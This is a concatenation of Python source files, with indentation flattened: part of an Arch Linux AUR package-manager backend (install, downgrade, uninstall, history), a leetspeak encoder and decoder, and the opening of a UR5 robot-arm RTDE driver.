pkgdict = aur.map_pkgbuild(f.read())
if not handler.handle(SystemProcess(subproc=new_subprocess(['git', 'reset', '--hard', commit], cwd=clone_path), check_error_output=False)):
watcher.print('Could not downgrade anymore. Aborting...')
return False
if '{}-{}'.format(pkgdict.get('pkgver'), pkgdict.get('pkgrel')) == pkg.version:
# current version found
watcher.change_substatus(self.i18n['arch.downgrade.version_found'])
break
watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
return self._make_pkg(pkg.name, pkg.maintainer, root_password, handler, app_build_dir, clone_path, dependency=False, skip_optdeps=True)
else:
watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.impossible'].format(pkg.name),
type_=MessageType.ERROR)
return False
watcher.show_message(title=self.i18n['error'], body=self.i18n['arch.downgrade.no_commits'], type_=MessageType.ERROR)
return False
finally:
if os.path.exists(app_build_dir):
handler.handle(SystemProcess(subproc=new_subprocess(['rm', '-rf', app_build_dir])))
return False
def clean_cache_for(self, pkg: ArchPackage):
if os.path.exists(pkg.get_disk_cache_path()):
shutil.rmtree(pkg.get_disk_cache_path())
def update(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
return self.install(pkg=pkg, root_password=root_password, watcher=watcher, skip_optdeps=True)
def _uninstall(self, pkg_name: str, root_password: str, handler: ProcessHandler) -> bool:
res = handler.handle(SystemProcess(new_root_subprocess(['pacman', '-R', pkg_name, '--noconfirm'], root_password)))
if res:
cached_paths = [ArchPackage.disk_cache_path(pkg_name, 'aur'), ArchPackage.disk_cache_path(pkg_name, 'mirror')]
for path in cached_paths:
if os.path.exists(path):
shutil.rmtree(path)
break
return res
def uninstall(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
watcher.change_progress(10)
info = pacman.get_info_dict(pkg.name)
watcher.change_progress(50)
if info.get('required by'):
pkname = bold(pkg.name)
msg = '{}:<br/><br/>{}<br/><br/>{}'.format(self.i18n['arch.uninstall.required_by'].format(pkname), bold(info['required by']), self.i18n['arch.uninstall.required_by.advice'].format(pkname))
watcher.show_message(title=self.i18n['error'], body=msg, type_=MessageType.WARNING)
return False
uninstalled = self._uninstall(pkg.name, root_password, handler)
watcher.change_progress(100)
return uninstalled
def get_managed_types(self) -> Set["type"]:
return {ArchPackage}
def get_info(self, pkg: ArchPackage) -> dict:
if pkg.installed:
t = Thread(target=self.mapper.fill_package_build, args=(pkg,))
t.start()
info = pacman.get_info_dict(pkg.name)
t.join()
if pkg.pkgbuild:
info['13_pkg_build'] = pkg.pkgbuild
info['14_installed_files'] = pacman.list_installed_files(pkg.name)
return info
else:
info = {
'01_id': pkg.id,
'02_name': pkg.name,
'03_version': pkg.version,
'04_popularity': pkg.popularity,
'05_votes': pkg.votes,
'06_package_base': pkg.package_base,
'07_maintainer': pkg.maintainer,
'08_first_submitted': pkg.first_submitted,
'09_last_modified': pkg.last_modified,
'10_url': pkg.url_download
}
srcinfo = self.aur_client.get_src_info(pkg.name)
if srcinfo:
if srcinfo.get('depends'):
info['11_dependson'] = srcinfo['depends']
if srcinfo.get('optdepends'):
info['12_optdepends'] = srcinfo['optdepends']
if pkg.pkgbuild:
info['00_pkg_build'] = pkg.pkgbuild
else:
info['11_pkg_build_url'] = pkg.get_pkg_build_url()
return info
def get_history(self, pkg: ArchPackage) -> PackageHistory:
temp_dir = '{}/build_{}'.format(BUILD_DIR, int(time.time()))
try:
Path(temp_dir).mkdir(parents=True)
run_cmd('git clone ' + URL_GIT.format(pkg.name), print_error=False, cwd=temp_dir)
clone_path = '{}/{}'.format(temp_dir, pkg.name)
pkgbuild_path = '{}/PKGBUILD'.format(clone_path)
commits = git.list_commits(clone_path)
if commits:
history, status_idx = [], -1
for idx, commit in enumerate(commits):
with open(pkgbuild_path) as f:
pkgdict = aur.map_pkgbuild(f.read())
if status_idx < 0 and '{}-{}'.format(pkgdict.get('pkgver'), pkgdict.get('pkgrel')) == pkg.version:
status_idx = idx
history.append({'1_version': pkgdict['pkgver'], '2_release': pkgdict['pkgrel'],
'3_date': commit['date']}) # the number prefix is to ensure the rendering order
if idx + 1 < len(commits):
if not run_cmd('git reset --hard ' + commits[idx + 1]['commit'], cwd=clone_path):
break
return PackageHistory(pkg=pkg, history=history, pkg_status_idx=status_idx)
finally:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
def _install_deps(self, deps: Set[str], pkg_mirrors: dict, root_password: str, handler: ProcessHandler, change_progress: bool = False) -> str:
"""
:param deps:
:param pkg_mirrors:
:param root_password:
:param handler:
:return: not installed dependency
"""
progress_increment = int(100 / len(deps))
progress = 0
self._update_progress(handler.watcher, 1, change_progress)
for pkgname in deps:
mirror = pkg_mirrors[pkgname]
            handler.watcher.change_substatus(self.i18n['arch.install.dependency.install'].format(bold('{} ({})'.format(pkgname, mirror))))
if mirror == 'aur':
installed = self._install_from_aur(pkgname=pkgname, maintainer=None, root_password=root_password, handler=handler, dependency=True, change_progress=False)
else:
installed = self._install(pkgname=pkgname, maintainer=None, root_password=root_password, handler=handler, install_file=None, mirror=mirror, change_progress=False)
if not installed:
return pkgname
progress += progress_increment
self._update_progress(handler.watcher, progress, change_progress)
self._update_progress(handler.watcher, 100, change_progress)
def _map_mirrors(self, pkgnames: Set[str]) -> dict:
pkg_mirrors = pacman.get_mirrors(pkgnames) # getting mirrors set
        if len(pkgnames) != len(pkg_mirrors):  # checking if any dep not found in the distro mirrors is from AUR
nomirrors = {p for p in pkgnames if p not in pkg_mirrors}
for pkginfo in self.aur_client.get_info(nomirrors):
if pkginfo.get('Name') in nomirrors:
pkg_mirrors[pkginfo['Name']] = 'aur'
return pkg_mirrors
def _pre_download_source(self, pkgname: str, project_dir: str, watcher: ProcessWatcher) -> bool:
if self.context.file_downloader.is_multithreaded():
srcinfo = self.aur_client.get_src_info(pkgname)
pre_download_files = []
for attr in SOURCE_FIELDS:
if srcinfo.get(attr):
                    if attr == 'source_x86_64' and not self.context.is_system_x86_64():
continue
else:
for f in srcinfo[attr]:
if RE_PRE_DOWNLOADABLE_FILES.findall(f):
pre_download_files.append(f)
if pre_download_files:
for f in pre_download_files:
fdata = f.split('::')
args = {'watcher': watcher, 'cwd': project_dir}
if len(fdata) > 1:
args.update({'file_url': fdata[1], 'output_path': fdata[0]})
else:
args.update({'file_url': fdata[0], 'output_path': None})
if not self.context.file_downloader.download(**args):
watcher.print('Could not download source file {}'.format(args['file_url']))
return False
return True
def _make_pkg(self, pkgname: str, maintainer: str, root_password: str, handler: ProcessHandler, build_dir: str, project_dir: str, dependency: bool, skip_optdeps: bool = False, change_progress: bool = True) -> bool:
self._pre_download_source(pkgname, project_dir, handler.watcher)
self._update_progress(handler.watcher, 50, change_progress)
if not self._install_missings_deps_and_keys(pkgname, root_password, handler, project_dir):
return False
# building main package
handler.watcher.change_substatus(self.i18n['arch.building.package'].format(bold(pkgname)))
pkgbuilt, output = handler.handle_simple(SimpleProcess(['makepkg', '-ALcsmf'], cwd=project_dir))
self._update_progress(handler.watcher, 65, change_progress)
if pkgbuilt:
gen_file = [fname for root, dirs, files in os.walk(build_dir) for fname in files if re.match(r'^{}-.+\.tar\.xz'.format(pkgname), fname)]
if not gen_file:
handler.watcher.print('Could not find generated .tar.xz file. Aborting...')
return False
install_file = '{}/{}'.format(project_dir, gen_file[0])
if self._install(pkgname=pkgname, maintainer=maintainer, root_password=root_password, mirror='aur', handler=handler,
install_file=install_file, pkgdir=project_dir, change_progress=change_progress):
if dependency or skip_optdeps:
return True
handler.watcher.change_substatus(self.i18n['arch.optdeps.checking'].format(bold(pkgname)))
if self._install_optdeps(pkgname, root_password, handler, project_dir, change_progress=change_progress):
return True
return False
def _install_missings_deps_and_keys(self, pkgname: str, root_password: str, handler: ProcessHandler, pkgdir: str) -> bool:
handler.watcher.change_substatus(self.i18n['arch.checking.deps'].format(bold(pkgname)))
check_res = makepkg.check(pkgdir, handler)
if check_res:
if check_res.get('missing_deps'):
depnames = {RE_SPLIT_VERSION.split(dep)[0] for dep in check_res['missing_deps']}
dep_mirrors = self._map_mirrors(depnames)
                for dep in depnames:  # checking whether a dependency could not be found in any mirror
if dep not in dep_mirrors:
message.show_dep_not_found(dep, self.i18n, handler.watcher)
return False
handler.watcher.change_substatus(self.i18n['arch.missing_deps_found'].format(bold(pkgname)))
if not confirmation.request_install_missing_deps(pkgname, dep_mirrors, handler.watcher, self.i18n):
handler.watcher.print(self.i18n['action.cancelled'])
return False
dep_not_installed = self._install_deps(depnames, dep_mirrors, root_password, handler, change_progress=False)
if dep_not_installed:
message.show_dep_not_installed(handler.watcher, pkgname, dep_not_installed, self.i18n)
return False
# it is necessary to re-check because missing PGP keys are only notified when there are none missing
return self._install_missings_deps_and_keys(pkgname, root_password, handler, pkgdir)
if check_res.get('gpg_key'):
if handler.watcher.request_confirmation(title=self.i18n['arch.aur.install.unknown_key.title'],
body=self.i18n['arch.install.aur.unknown_key.body'].format(bold(pkgname), bold(check_res['gpg_key']))):
handler.watcher.change_substatus(self.i18n['arch.aur.install.unknown_key.status'].format(bold(check_res['gpg_key'])))
if not handler.handle(gpg.receive_key(check_res['gpg_key'])):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.unknown_key.receive_error'].format(bold(check_res['gpg_key'])))
return False
else:
handler.watcher.print(self.i18n['action.cancelled'])
return False
if check_res.get('validity_check'):
handler.watcher.show_message(title=self.i18n['arch.aur.install.validity_check.title'],
body=self.i18n['arch.aur.install.validity_check.body'].format(bold(pkgname)),
type_=MessageType.ERROR)
return False
return True
def _install_optdeps(self, pkgname: str, root_password: str, handler: ProcessHandler, pkgdir: str, change_progress: bool = True) -> bool:
with open('{}/.SRCINFO'.format(pkgdir)) as f:
odeps = pkgbuild.read_optdeps_as_dict(f.read())
if not odeps:
return True
to_install = {d for d in odeps if not pacman.check_installed(d)}
if not to_install:
return True
pkg_mirrors = self._map_mirrors(to_install)
if pkg_mirrors:
final_optdeps = {dep: {'desc': odeps.get(dep), 'mirror': pkg_mirrors.get(dep)} for dep in to_install if dep in pkg_mirrors}
deps_to_install = confirmation.request_optional_deps(pkgname, final_optdeps, handler.watcher, self.i18n)
if not deps_to_install:
return True
else:
dep_not_installed = self._install_deps(deps_to_install, pkg_mirrors, root_password, handler, change_progress=True)
if dep_not_installed:
message.show_optdep_not_installed(dep_not_installed, handler.watcher, self.i18n)
return False
return True
def _install(self, pkgname: str, maintainer: str, root_password: str, mirror: str, handler: ProcessHandler, install_file: str = None, pkgdir: str = '.', change_progress: bool = True):
check_install_output = []
pkgpath = install_file if install_file else pkgname
handler.watcher.change_substatus(self.i18n['arch.checking.conflicts'].format(bold(pkgname)))
for check_out in SimpleProcess(['pacman', '-U' if install_file else '-S', pkgpath], root_password=root_password, cwd=pkgdir).instance.stdout:
check_install_output.append(check_out.decode())
self._update_progress(handler.watcher, 70, change_progress)
if check_install_output and 'conflict' in check_install_output[-1]:
conflicting_apps = [w[0] for w in re.findall(r'((\w|\-|\.)+)\s(and|are)', check_install_output[-1])]
conflict_msg = ' {} '.format(self.i18n['and']).join([bold(c) for c in conflicting_apps])
if not handler.watcher.request_confirmation(title=self.i18n['arch.install.conflict.popup.title'],
body=self.i18n['arch.install.conflict.popup.body'].format(conflict_msg)):
handler.watcher.print(self.i18n['action.cancelled'])
return False
else: # uninstall conflicts
self._update_progress(handler.watcher, 75, change_progress)
to_uninstall = [conflict for conflict in conflicting_apps if conflict != pkgname]
for conflict in to_uninstall:
handler.watcher.change_substatus(self.i18n['arch.uninstalling.conflict'].format(bold(conflict)))
if not self._uninstall(conflict, root_password, handler):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.uninstalling.conflict.fail'].format(bold(conflict)),
type_=MessageType.ERROR)
return False
handler.watcher.change_substatus(self.i18n['arch.installing.package'].format(bold(pkgname)))
self._update_progress(handler.watcher, 80, change_progress)
installed = handler.handle(pacman.install_as_process(pkgpath=pkgpath, root_password=root_password, aur=install_file is not None, pkgdir=pkgdir))
self._update_progress(handler.watcher, 95, change_progress)
if installed and self.context.disk_cache:
handler.watcher.change_substatus(self.i18n['status.caching_data'].format(bold(pkgname)))
if self.context.disk_cache:
disk.save_several({pkgname}, mirror=mirror, maintainer=maintainer, overwrite=True, categories=self.categories)
self._update_progress(handler.watcher, 100, change_progress)
return installed
def _update_progress(self, watcher: ProcessWatcher, val: int, change_progress: bool):
if change_progress:
watcher.change_progress(val)
def _import_pgp_keys(self, pkgname: str, root_password: str, handler: ProcessHandler):
srcinfo = self.aur_client.get_src_info(pkgname)
if srcinfo.get('validpgpkeys'):
handler.watcher.print(self.i18n['arch.aur.install.verifying_pgp'])
keys_to_download = [key for key in srcinfo['validpgpkeys'] if not pacman.verify_pgp_key(key)]
if keys_to_download:
keys_str = ''.join(
['<br/><span style="font-weight:bold"> - {}</span>'.format(k) for k in keys_to_download])
msg_body = '{}:<br/>{}<br/><br/>{}'.format(self.i18n['arch.aur.install.pgp.body'].format(bold(pkgname)),
keys_str, self.i18n['ask.continue'])
if handler.watcher.request_confirmation(title=self.i18n['arch.aur.install.pgp.title'], body=msg_body):
for key in keys_to_download:
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.substatus'].format(bold(key)))
if not handler.handle(pacman.receive_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.receive_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
if not handler.handle(pacman.sign_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.sign_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.success'])
else:
handler.watcher.print(self.i18n['action.cancelled'])
return False
def _install_from_aur(self, pkgname: str, maintainer: str, root_password: str, handler: ProcessHandler, dependency: bool, skip_optdeps: bool = False, change_progress: bool = True) -> bool:
app_build_dir = '{}/build_{}'.format(BUILD_DIR, int(time.time()))
try:
if not os.path.exists(app_build_dir):
build_dir = handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', app_build_dir])))
self._update_progress(handler.watcher, 10, change_progress)
if build_dir:
file_url = URL_PKG_DOWNLOAD.format(pkgname)
file_name = file_url.split('/')[-1]
handler.watcher.change_substatus('{} {}'.format(self.i18n['arch.downloading.package'], bold(file_name)))
download = handler.handle(SystemProcess(new_subprocess(['wget', file_url], cwd=app_build_dir), check_error_output=False))
if download:
self._update_progress(handler.watcher, 30, change_progress)
handler.watcher.change_substatus('{} {}'.format(self.i18n['arch.uncompressing.package'], bold(file_name)))
uncompress = handler.handle(SystemProcess(new_subprocess(['tar', 'xvzf', '{}.tar.gz'.format(pkgname)], cwd=app_build_dir)))
self._update_progress(handler.watcher, 40, change_progress)
if uncompress:
uncompress_dir = '{}/{}'.format(app_build_dir, pkgname)
return self._make_pkg(pkgname=pkgname,
maintainer=maintainer,
root_password=root_password,
handler=handler,
build_dir=app_build_dir,
project_dir=uncompress_dir,
dependency=dependency,
skip_optdeps=skip_optdeps,
change_progress=change_progress)
finally:
if os.path.exists(app_build_dir):
handler.handle(SystemProcess(new_subprocess(['rm', '-rf', app_build_dir])))
return False
def install(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher, skip_optdeps: bool = False) -> bool:
res = self._install_from_aur(pkg.name, pkg.maintainer, root_password, ProcessHandler(watcher), dependency=False, skip_optdeps=skip_optdeps)
if res:
if os.path.exists(pkg.get_disk_data_path()):
with open(pkg.get_disk_data_path()) as f:
data = f.read()
if data:
data = json.loads(data)
pkg.fill_cached_data(data)
return res
def _is_wget_available(self):
res = run_cmd('which wget')
return res and not res.strip().startswith('which ')
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
try:
return self.arch_distro and pacman.is_enabled() and self._is_wget_available()
except FileNotFoundError:
return False
def is_downgrade_enabled(self) -> bool:
try:
new_subprocess(['git', '--version'])
return True
except FileNotFoundError:
return False
def cache_to_disk(self, pkg: ArchPackage, icon_bytes: bytes, only_icon: bool):
pass
def requires_root(self, action: str, pkg: ArchPackage):
return action != 'search'
def prepare(self):
self.dcache_updater.start()
self.comp_optimizer.start()
self.aur_index_updater.start()
self.categories_mapper.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
installed = self.read_installed(disk_loader=None, internet_available=internet_available).installed
return [PackageUpdate(p.id, p.latest_version, 'aur') for p in installed if p.update]
def list_warnings(self, internet_available: bool) -> List[str]:
warnings = []
if self.arch_distro:
if not pacman.is_enabled():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('pacman')))
if not self._is_wget_available():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('wget')))
if not git.is_enabled():
warnings.append(self.i18n['arch.warning.git'].format(bold('git')))
return warnings
def list_suggestions(self, limit: int) -> List[PackageSuggestion]:
res = []
sugs = [(i, p) for i, p in suggestions.ALL.items()]
sugs.sort(key=lambda t: t[1].value, reverse=True)
if limit > 0:
sugs = sugs[0:limit]
sug_names = {s[0] for s in sugs}
api_res = self.aur_client.get_info(sug_names)
if api_res:
self.categories_mapper.join()
for pkg in api_res:
if pkg.get('Name') in sug_names:
res.append(PackageSuggestion(self.mapper.map_api_data(pkg, {}, self.categories), suggestions.ALL.get(pkg['Name'])))
return res
def is_default_enabled(self) -> bool:
return False
def launch(self, pkg: ArchPackage):
if pkg.command:
subprocess.Popen(pkg.command.split(' '))
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
pass
|
LeetSpeak.py
|
import random,copy,operator
from multiprocessing import Process,Pipe
from Dictionary import Dictionary
from Spelling import Spelling
#from GutenBooks import GutenBooks
#thread info: http://jessenoller.com/2009/02/01/python-threads-and-the-global-interpreter-lock/
#def synchronized():
# the_lock = Lock()
# def fwrap(function):
# def newFunction(*args, **kw):
# with the_lock:
# return function(*args, **kw)
# return newFunction
# return fwrap
class LeetSpeak:
def __init__(self,processes=1):
#number of threads
if processes > 0:
self.processes=processes
else:
self.processes=1
#load word frequency and spell checker
self.spelling=Spelling()
#load the dictionaries
self.jargon = Dictionary("slang")
self.dictionary = self.spelling.dictionary
self.stopwords = self.spelling.stopwords
self.a=["a","4","@","/-\\","/\\","/_\\","^","aye","ci","λ","∂","//-\\\\","/=\\","ae"]
self.b=["b","8","|3","6","13","l3","]3","|o","1o","lo","ß","]]3","|8","l8","18","]8"]
self.c=["c","(","<","[","{","sea","see","k","©","¢","€"]
self.d=["d","|]","l]","1]","|)","l)","1)","[)","|}","l]","1}","])","i>","|>","l>","1>","0","cl","o|","o1","ol","Ð","∂","ð"]
self.e=["e","3","&","[-","€","ii","ə","£","iii"]
self.f=["f","|=","]=","}","ph","(=","[=","ʃ","eph","ph"]
self.g=["g","6","9","&","(_+","C-","gee","jee","(Y,","cj","[","-","(γ,","(_-"]
self.h=["h","|-|","#","[-]","{-}","]-[",")-(","(-)",":-:","}{","}-{","aych","╫","]]-[[","aech"]
self.i=["!","1","|","l","eye","3y3","ai","i"]
self.j=["j","_|","_/","]","</","_)","_l","_1","¿","ʝ","ul","u1","u|","jay","(/","_]"]
self.k=["k","x","|<","|x","|{","/<","\\<","/x","\\x","ɮ","kay"]
self.l=["l","1","7","|_","1_","l_","lJ","£","¬","el"]
self.m=["m","/\/\\","|\\/|","em","|v|","[v]","^^","nn","//\\\\//\\\\","(V)","(\/)","/|\\","/|/|",".\\\\","/^^\\","/V\\","|^^|","JVL","][\\\\//][","[]\/[]","[]v[]","(t)"]
self.n=["n","|\\|","/\\/","//\\\\//","[\\]","<\\>","{\\}","//","[]\\[]","]\\[","~","₪","/|/","in"]
#the ω is because Ω is mistakenly taken as that character sometimes...
self.o=["o","0","()","oh","[]","{}","¤","Ω","ω","*","[[]]","oh"]
self.p=["p","|*","l*","1*","|o","lo","1o","|>","l>","1>","|\"","l\"","1\"","?","9","[]d","|7","l7","17","q","|d","ld","1d","℗","|º","1º","lº","þ","¶","pee"]
self.q=["q","0_","o_","0,","o,","(,)","[,]","<|","<l","<1","cue","9","¶","kew"]
self.r=["r","|2","l2","12","2","/2","I2","|^","l^","1^","|~","l~","1~","lz","[z","|`","l`","1`",".-","®","Я","ʁ","|?","l?","1?","arr"]
self.s=["s","5","$","z","es","2","§","š",",,\\``"]
self.t=["t","7","+","-|-","-l-","-1-","1","']['","†"]
self.u=["u","|_|","l_l","1_1","(_)","[_]","{_}","y3w","m","\\_/","\\_\\","/_/","µ","yew","yoo","yuu"]
self.v=["v","\\/","\\\\//","√"]
self.w=["w","\\/\\/","vv","'//","\\\\'","\\^/","(n)","\\x/","\\|/","\\_|_/","\\_l_/","\\_1_/","\\//\\//","\\_:_/","]i[","uu","Ш","ɰ","1/\\/","\\/1/","1/1/"]
self.x=["x","%","><","><,","}{","ecks","x","*",")(","ex","Ж","×"]
self.y=["y","j","`/","`(","-/","'/","\\-/","Ψ","φ","λ","Ч","¥","``//","\\j","wai"]
self.z=["z","2","~/_","%","7_","ʒ","≥","`/_"]
self.zero=["0","o","zero","cero","()"]
self.one=["1","won","one","l","|","]["]
self.two=["two","to","too","2","z"]
self.three=["e","3","three"]
self.four=["4","four","for","fore","a"]
self.five=["5","five","s"]
self.six=["6","six","g"]
self.seven=["7","seven","t","l"]
self.eight=["8","eight","b"]
self.nine=["9","nine","g"]
#"0":self.zero,"1":self.one,"2":self.two,"3":self.three,"4":self.four,"5":self.five,"6":self.six,"7":self.seven,"8":self.eight,"9":self.nine
self.alphabet={"a":self.a, "b":self.b, "c":self.c, "d":self.d, "e":self.e, "f":self.f, "g":self.g, "h":self.h, "i":self.i, "j":self.j, "k":self.k, "l":self.l, "m":self.m, "n":self.n, "o":self.o, "p":self.p, "q":self.q, "r":self.r, "s":self.s, "t":self.t, "u":self.u, "v":self.v, "w":self.w, "x":self.x, "y":self.y, "z":self.z}
def ConvertToLeet(self,text):
"""
        For each alphabetic character, randomly pick one of its leet substitutions; any other character is passed through unchanged.
"""
leet=""
for letter in list(text):
if letter.isalpha() and self.alphabet[letter.lower()]:
values=self.alphabet[letter.lower()]
random.seed()
number=random.randint(1,len(values))
leet+=values[number-1]
else:
leet+=letter
return leet
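    # Usage sketch (illustration only; output is random):
    #   l = LeetSpeak()
    #   l.ConvertToLeet("hello")   # e.g. '|-|3l10', each letter replaced by one of its substitutions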
def rec_parse(self,text,previous=[]):
"""
Input:
Output:
"""
possibilities=[]
text_length=len(list(text))
if text_length > 7:
length=8
else:
length=text_length
for q in range(1,length):
if q < len(text):
possibilities.append(previous+[text[0:q],text[q:text_length]])
possibilities+=self.rec_parse(text[q:text_length],previous+[text[0:q]])
return possibilities
def rec_scan_array(self,array,previous=[]):
"""
Input: [['h'], ['e'], ['i', 'l', 't'], ['i', 'l', 't'], ['d', 'o']]
Output:
['h','e','i','i','d'],
['h','e','i','i','o'],
['h','e','i','1','d'],
['h','e','i','1','o'],
...
"""
words=[]
passon=copy.copy(array)
passon.pop(0)
if len(array) > 0:
for let in array[0]:
letters=copy.copy(previous)
letters.append(let)
if len(passon) > 0:
words+=self.rec_scan_array(passon,letters)
if len(array) == 1:
words.append("".join(letters))
del letters
del passon
return words
def ConvertFromLeet(self,text):
"""
Convert leet to readable English text. Find all possible words, check which are English, check for misspellings, etc.
        Uses self.processes, so when creating the LeetSpeak() object, you can specify the number of worker processes to use: l=LeetSpeak(processes=3)
"""
#figure out how many words each thread should work on
split=text.split(" ")
thread_count={}
thread_words={}
thread_num=1
for word in split:
#add word to the array for the current thread
if thread_num in thread_count:
thread_count[thread_num]+=1
else:
thread_count[thread_num]=1
thread_words[thread_num]=[]
#up the thread_num unless it is currently at the number of threads we want, then set it to 1 to start over again
if self.processes > thread_num:
thread_num+=1
else:
thread_num=1
#compute what words each thread should decode
for num,word in enumerate(split):
for thread,words in thread_words.items():
if len(words) < thread_count[thread]:
thread_words[thread].append(word)
break
#INFORMATION:
#if self.processes = 3 and text = "cows are cool or not", thread_words={1: ['cows', 'are'], 2: ['cool', 'or'], 3: ['not']}
#create the processes
threads={}
num_threads=len(thread_words)
result_english=""
thread_results={}
receive_pipe,send_pipe=Pipe()
for i in range(self.processes):
if num_threads >= i+1:
threads[i]=Process(target=self.ConvertFromLeet_thread,args=(thread_words[i+1],i,send_pipe))
threads[i].start()
        #wait for each process to finish and collect its result from the pipe
for i in range(self.processes):
if num_threads >= i+1:
threads[i].join()
result=receive_pipe.recv()
thread_results[result[0]]=result[1]
#close the pipe
send_pipe.close()
#sort the results
thread_results=sorted(thread_results.items())
#make a string out of the results
for thread,string in thread_results:
result_english+=string+" "
return result_english.strip()
def ConvertFromLeet_thread(self,text,thread_id,pipe):
"""
The function that ConvertFromLeet() calls for each thread.
"""
english=[]
#convert each word
for word in text:
#get all the character locations less than 8 (e.g. "c,ow", "co,w", and "cow" for "cow")
#this uses some recursive substringing
possibilities=self.rec_parse(word.lower())
#append the actual "word" if it is less than 8 characters, since it might be a single letter (e.g. "n" for "and")
if len(word) <= 8:
possibilities.append([word.lower()])
#calculate what this could be in leet (if it can be anything)
validwords=[]
for possibility in possibilities:
letters=[]
valid=1
for char in possibility:
chars=[]
for let,val in self.alphabet.items():
if char in val:
chars.append(let)
if len(chars) == 0:
valid=0
break
else:
letters.append(chars)
del chars
if valid==1 and len(letters) > 0:
#generate possible words from given letters
words=self.rec_scan_array(letters)
validwords+=words
del words
#print(validwords)
#check which valid words are english if there's more than one option
#go with the most frequently used english word
if len(validwords) > 0:
englishwords={}
for valid in validwords:
score=1+5/len(valid)
#computer talk
if self.jargon.Contains(valid) == True:
value=2
jargon=self.jargon.Translate(valid)
if self.dictionary.Contains(jargon) == True:
value=4
score+=value
if len(jargon) > 0:
if jargon in englishwords:
englishwords[jargon]+=value
else:
englishwords[jargon]=score
score=0
#valid english
if len(valid) > 1 and self.dictionary.Contains(valid) == True:
score+=5
#frequency words
if self.stopwords.Contains(valid):
score+=self.spelling.Frequency(valid)
else:
score+=5*self.spelling.Frequency(valid)
#same length
if len(word) == len(valid):
score+=0.1
#no numbers
if valid.isalpha() == True:
score+=1
englishwords[valid]=score
#figure out what word is the most likely to be correctable
check=[]
skip=0
for valid in englishwords:
if valid.isalpha():
#if there is already a good word in the list, then don't bother with looking up spell corrections
if self.dictionary.Contains(valid) and len(valid) >= len(word)/2:
skip=1
check=[]
break
else:
check.append(valid)
if len(check)==0 and skip == 0:
                    check.append(list(englishwords.keys())[0])  # fall back to the first candidate word
#append the corrected version, hopefully
for item in check:
corrected=self.spelling.Check(item,dictionary=True,fast=True)
if corrected != False and len(corrected) > 0:
word=corrected[0]
if word not in englishwords:
frequency=self.spelling.Frequency(word)
#if it is on the stop list, don't add as much weight
if self.stopwords.Contains(word):
value=frequency+1
else:
value=5*frequency+1
#add weight if in the dictionary
if self.dictionary.Contains(word) == True:
value+=1
#add weight if not numbers
if word.isalpha() == True:
value+=1
englishwords[word]=value
else:
#if one of the corrected words list is in the englishwords list then up that value by 0.1
for correct in corrected:
if correct in englishwords:
englishwords[correct]+=0.1
#get the most likely word
final=sorted(englishwords.items(),key=operator.itemgetter(1),reverse=True)[0]
#add word
english.append(final[0])
#send the result
pipe.send([thread_id," ".join(english)])
|
ur5_driver.py
|
#!/usr/bin/python3
#This file also contains functionalities to control the gripper. This builds upon python-urx.
import logging
import multiprocessing as mp
import signal
import socket
import time
from copy import copy, deepcopy
import numpy as np
from klampt.math import vectorops
from scipy import signal as scipysignal
import rtde
import ur5_constants
from utils import in_limits
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
# NOTE: SETPOINT_NONE is special. It will never be passed to UR, indicates failure
SETPOINT_NONE = 0
SETPOINT_HALT = 1
SETPOINT_POSITION = 2
SETPOINT_VELOCITY = 3
SETPOINT_WRENCH = 4
SET_FREE_DRIVE = 5
# Integer registers
REG_SETPOINT = 0
REG_TYPE = 1
REG_FREE_DRIVE_ACTIVE = 3
REG_COMPLIANCE = 4
REG_ZERO_FTSENSOR = 10
# Double input registers
REG_TARGET = 0
REG_ACCELERATION = 6
REG_LOOKAHEAD = 7
REG_DAMPING = 7
REG_GAIN = 8
REG_G = 9
REG_LIMITS = 12
REG_FORCE_TARGET = 12
REG_TASK_FRAME = 18
# Double output registers
REG_JOINT_TORQUE = 0 # 0-5
class UR5RTDEDriver:
def __init__(self, host, IO_buffer, filter_flag, qmin, qmax, vmin, vmax, dashboard_client, **kwargs):
"""
An interface to the UR5 using the UR Real Time Data Exchange (RTDE) protocol.
Parameters:
host: The UR5 controller IP address
IO_buffer: Shared memory data structure for going between here and limbController.
filter_flag: Whether the wrench should be filtered.
qmin: Software joint position limit (min).
qmax: Software joint position limit (max).
vmin: Software joint velocity limit (min).
vmax: Software joint velocity limit (max).
dashboard_client: Dashboard client for communicating with the UR (for resetting protective
stops right now, nothing else). Instance of Motion.ur5dashboard.UR5DashboardClient.
Keyword arguments:
rtde_port: port for RTDE, default 30004
command_port: port for commands, default 30002
"""
self.dashboard_client = dashboard_client
self.qmin = qmin
self.qmax = qmax
self.vmin = vmin
self.vmax = vmax
self._robot_host = host
self._rtde_port = kwargs.pop('rtde_port', 30004)
self._command_port = kwargs.pop('command_port', 30002)
self._gripper = kwargs.pop('gripper', False)
self._speed_scale = None
self._cog = kwargs.pop('cog', [0.0,0.0,0.0])
self._payload = kwargs.pop('payload', 0.0)
self._gravity = kwargs.pop('gravity', [0, 0, 9.82])
self._version = None
self.IO_buffer = IO_buffer
self._start_time = None
self.last_t = 0
#stuff needed for threading
self._conn = None
self._max_speed_scale = None
self._sock = None
self.IO_buffer['running'] = 0
# Configuration that is guaranteed to be in the defined joint limits.
self._safe_config = None
